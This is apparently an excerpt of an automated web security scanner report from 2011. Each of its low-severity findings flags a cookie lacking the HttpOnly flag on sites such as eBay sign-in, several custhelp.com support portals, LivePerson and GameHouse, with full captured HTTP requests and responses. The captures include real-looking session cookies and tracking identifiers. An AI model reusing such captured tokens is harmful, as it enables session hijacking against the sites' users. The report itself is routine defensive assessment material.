Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Server: Apache
P3P: policyref="http://rac.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VC5SJgB0UnZTOwR0BAcAZw9KBz8BEgI5VysPPAQkBX9QIlY6AScMNQYlBQ8MJAh9BjEBIAIiBGwAa1ZqUlsHfFYcDGdUGFRyAwkHTVdqAVNUD1JvAEFSJVNTBDsEbgA3D2oHIgFpAmtXcw8q; path=/
RNT-Time: D=188110 t=1311107147909095
RNT-Machine: 07
Vary: Accept-Encoding
Content-Length: 22043
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xml
...[SNIP]...

14.5. http://rac.custhelp.com/app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rac.custhelp.com
Path:   /app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D HTTP/1.1
Host: rac.custhelp.com
Proxy-Connection: keep-alive
Referer: http://rac.custhelp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AnhSJgx4ASUEbFIiUVJSNVUQBDwDEAE6B3sAMwYmUSsNfwVpV3ECOwUmVV8HL1MmATYBIAEhAWkCaQU5Bg8CeQtBAWpWGgEnVV9SGAY7VQcCWVJvDE0BdgQEUm1RO1JlVTAEIQNrAWgHIwAl; __utma=130296460.418147885.1311107160.1311107160.1311107160.1; __utmb=130296460.1.10.1311107160; __utmc=130296460; __utmz=130296460.1311107160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:04 GMT
Server: Apache
P3P: policyref="http://rac.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VC4FcQVxBCBVPQ9%2FAgEEYwdCDDQDEFNoVytfbFBwVC4BcwVtBiBXbg49ViwMKQNwB3dXPwAoAiEHYgcKBDgCMlN3C2kNVAJ2UDUGOQAzUXBUeQVxBTcENFUwD38CDAR4By8MfAMzUyVXa18lUA5ULQEiBWkGcVcnDmZWbwxlA1kHeldJAGACTQdzBw8EEgJvUwQLCQ1kAhJQcQZdAGlRa1RjBTIFdQQ%2FVToPfwIs; path=/
RNT-Time: D=141226 t=1311107224928263
RNT-Machine: 08
Vary: Accept-Encoding
Content-Length: 22949
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xml
...[SNIP]...

14.6. http://real.custhelp.com/app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://real.custhelp.com
Path:   /app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D HTTP/1.1
Host: real.custhelp.com
Proxy-Connection: keep-alive
Referer: http://real.custhelp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=UihVIVUhVXFXP1UlUToJfVc4BD8AE1JpUCxaaQAgAHpQIgdrV3FQaQQnU1lSegZzAzQFJFZ2Bm4PZFdrUVhQKwNJCmEHSwQiUlgETgM%2FBzBSN1VUVSZVI1dXVWpROwk%2BVzIEIQBoUjtQdFp%2F; __utma=4935472.196986693.1311107154.1311107154.1311107154.1; __utmb=4935472.1.10.1311107154; __utmc=4935472; __utmz=4935472.1311107154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:53 GMT
Server: Apache
P3P: policyref="http://real.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9VIVImUXUDa1IiUToFcVA%2FUWoHFFRvC3dfbAQkAHoBcwlhUnRXbg49A3lQdVYlUSEHbwEpVnUPagMOUW1RYVZyWDoBWAN3A2pTalFgUmlVdlUvUndRbgNhUjVROgUmUAlRfgd%2BVCILaF8lBDwAdAENCS9SJVcxDnwDJlA%2BVj9RbQcJAX1WGw84Ax9RdFFfVhNYOAE3AzEDBFMuUSVSA1U5VTpSY1E2AyZSPVE%2FBSZQKQ%3D%3D; path=/
RNT-Time: D=204701 t=1311107213389208
RNT-Machine: 20
Vary: Accept-Encoding
Content-Length: 29269
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...

14.7. http://sales.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=21661174&d_id=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Thu, 23 Jun 2011 11:35:46 GMT
Content-Length: 12013
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDCQBRSSCT=FFBABKKDCAFDBFFDNEOMMCEA; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 21661174
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

14.8. https://signin.ebay.com/ws/eBayISAPI.dll  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://signin.ebay.com
Path:   /ws/eBayISAPI.dll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...

14.9. http://superpass.custhelp.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://superpass.custhelp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: superpass.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:44 GMT
Server: Apache
P3P: policyref="http://superpass.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9RJQ15CS1VPVUlVVVULABLUWoAE1JpAn4IOwcnCHJRIwhkACYDOlV2BQ8AKFMmAzRScwIiUjoAa1JuUVhULwVPXDcMQFZwVlwGTFBtVgFVMVFSDTMJf1VVVWpVP1RjAGVRdABoUjsCJggt; path=/
RNT-Time: D=250273 t=1311107144962595
RNT-Machine: 05
Vary: Accept-Encoding
Content-Length: 23059
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...

14.10. http://superpass.custhelp.com/app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://superpass.custhelp.com
Path:   /app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D HTTP/1.1
Host: superpass.custhelp.com
Proxy-Connection: keep-alive
Referer: http://superpass.custhelp.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=BX8FcQdzU3cGblQkVVUHfwNIATpQQ1ZtC3cAMw0tUigCcARoUXcNNAEiBw1WfgB1VmEGJ1V1AWkHbFFtXVRTKFEbAGsDT1ZwUlgETlZrDVoFYQUGBzlTJQYGVGtVPwcwA2YBJFA4Vj8LLwAl; __utma=152909883.1445521186.1311107156.1311107156.1311107156.1; __utmb=152909883.1.10.1311107156; __utmc=152909883; __utmz=152909883.1311107156.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:59 GMT
Server: Apache
P3P: policyref="http://superpass.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UykEcAN3U3cDa1cnVFRWLg5FBj1RQldsUS0LOAMjVC5QIlI6AiRVbA88BH5Sd1QnVycBaVZ%2BBSZTNgUIAz9TYwMnWDoNVFMnUTlUZQEzDDlTcAR%2BAyZTbQNpVzNUMVZ1DlcGKVEoVyFRMgtxAztUIFBcUnQCdVUzD30EIVI8VD1XawEPVioFSFNkBRkDJlNdA0ZYOQ1bU2BRVFRkAXUMXVM%2FBGsDMlM0AyZXOFQ6VnUOdw%3D%3D; path=/
RNT-Time: D=247214 t=1311107219688867
RNT-Machine: 18
Vary: Accept-Encoding
Content-Length: 23322
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...

14.11. https://support.discoverbing.com/LTS/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.discoverbing.com
Path:   /LTS/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LTS/default.aspx?SSID=15&MSID=b3669c96-3886-4430-9363-3e7a37fa4b8a&SiteLCID=1033&RefURL=http%3a%2f%2fonlinehelp.microsoft.com%2fen-us%2fbing%2fff808415.aspx&ContentType=DM&EventCollectionID=1&FlexId=12&FlexValue4=mozilla%2f5.0%20(windows%20nt%206.1%3b%20wow64)%20applewebkit%2f534.30%20(khtml%2c%20like%20gecko)%20chrome%2f12.0.742.122%20safari%2f534.30&FlexValue1=bing&FlexValue2=global_support_oasp&FlexValue3=&FlexValue5=&PassportStatus=0&URL=https%3a%2f%2fsupport.discoverbing.com%2fDefault.aspx%3f%26st%3d1%26wfxredirect%3d1&ContentId=global_support_oasp HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: https://support.discoverbing.com/Default.aspx?&st=1&wfxredirect=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; scrx=1; MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; AuthKey=oss_bing; WFXLANG=en-us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Jul 2011 15:18:15 GMT
Pragma: no-cache
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: GsfxSessionCookie=44234530295139662; domain=.microsoft.com; path=/
Set-Cookie: MC1=GUID=2ba8c043c3ce4713ae02820ed49cd1d7&HASH=2ba8&LV=20117&V=3; domain=.microsoft.com; expires=Mon, 19-Jul-2021 15:18:15 GMT; path=/
Set-Cookie: GsfxStatsLog=true; domain=.microsoft.com; path=/
Vary: Accept-Encoding
Content-Length: 43

GIF89a.............!.......,...........D..;

14.12. http://support.gamehouse.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.gamehouse.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:39 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=B30EcAZyAiZUPA9%2FBBEEYABHAjhTQF1mAHwJOgYmBX8AcgRoByEHPlBzBA5SegJ3UWYHJlNzVDxQOw0xV14GfQVPCmEHS1ZwAAoBSwo3AUUHXAQHBk8Ca1RUDzAEbgQzAGUCJ1M7XTQAJAks; path=/
RNT-Time: D=121840 t=1311107139940601
RNT-Machine: 02
Vary: Accept-Encoding
Content-Length: 65280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...

14.13. http://support.gamehouse.com/app/answers/detail/a_id/861/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.gamehouse.com
Path:   /app/answers/detail/a_id/861/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/detail/a_id/861/ HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; __qca=P0-962211929-1311107164228; cpath=site; cp_session=BH5YLFImAydWPgZ2VEFUMAFGUGoEF1RvUS1fbAUlViwGdAl1UXdRaAB6UiZQNFRwVT1UJAJgVWwBPQd5UjFVMwY0XyVQflImVmUIYAFxUTwEZFhjUjADJ1Y%2BBnZUQFQ0AWhQZwR0VDJRZ19uBXRWcwYjCWVRJlFwAHxSKFB1VDdVJVQ8AnNVCAEqByZSYlVyBnNfblA9UmpWWgguAUlRYQRLWH5SDwNGVj0GE1RdVAABS1BtBANUbVFuXzEFZlZ3BmsJPVF3US8%3D; __utma=30093501.1002048789.1311107164.1311107164.1311107164.1; __utmb=30093501.3.10.1311107164; __utmc=30093501; __utmz=30093501.1311107164.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107252636%7C1468787252636%3B%20s_invisit%3Dtrue%7C1311109052639%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3Drealgamehousedev%253D%252526pid%25253DSupport%2525253A%25252520Home%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.gamehouse.com/app/answers/detail/a_id/861/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:34 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UykAdAB0ByNaMlMjABUAZAVCBz1QQwA7BHgNPgMjB30MflM7ByECOwc0VixXclEiVSUDawMrU3ADZAZ2AW5VIwcwWjoDOQJ4UTcCOVJiAiNTfgB0AGQHYFp8U28AMgBsBWQHd1A%2FAHYERQ00A2wHNAx5U2gHMwJoB3VWc1clUTJVdANzA3xTcANmBgsBPVVlByNaOANaAnZROQI9UmcCI1N%2BAHQAPwc3WjlTIwAOAHwFLQd3UGAAdgQ4DXcDXQd%2BDC9TPwdwAnIHb1ZvVz5RC1UoAx0DY1McA3cGDgEXVTgHRlpYA1QCGlFuAllSOwI4U2QANwBwBzxaNVMjAC4%3D; path=/
RNT-Time: D=151655 t=1311107254201788
RNT-Machine: 04
Vary: Accept-Encoding
Content-Length: 71984
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...

14.14. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.gamehouse.com
Path:   /app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; cp_session=A3lTJwZyACQHbwR0AhdSNlQTUmhSQVVuUS0JOgUlVS8MfgFtBSMCOwYlU1kAKAh9U2QGJ1NzVT0FbgU5UFkBelYcAGsGSgchAwkASgM%2BDEgDWFNQBk8AaQcHBDsCaFJlVDFSd1I6VTxRdQks; __qca=P0-962211929-1311107164228; cpath=site; __utma=30093501.1002048789.1311107164.1311107164.1311107164.1; __utmb=30093501.2.10.1311107164; __utmc=30093501; __utmz=30093501.1311107164.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107207014%7C1468787207014%3B%20s_invisit%3Dtrue%7C1311109007016%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3Drealgamehousedev%253D%252526pid%25253DSupport%2525253A%25252520Home%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.gamehouse.com/app/answers/list/c/188%2525252C624/catname/Game%2525252520issues/session/L3NpZC9GZUNoRm%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:38 GMT
Server: Apache
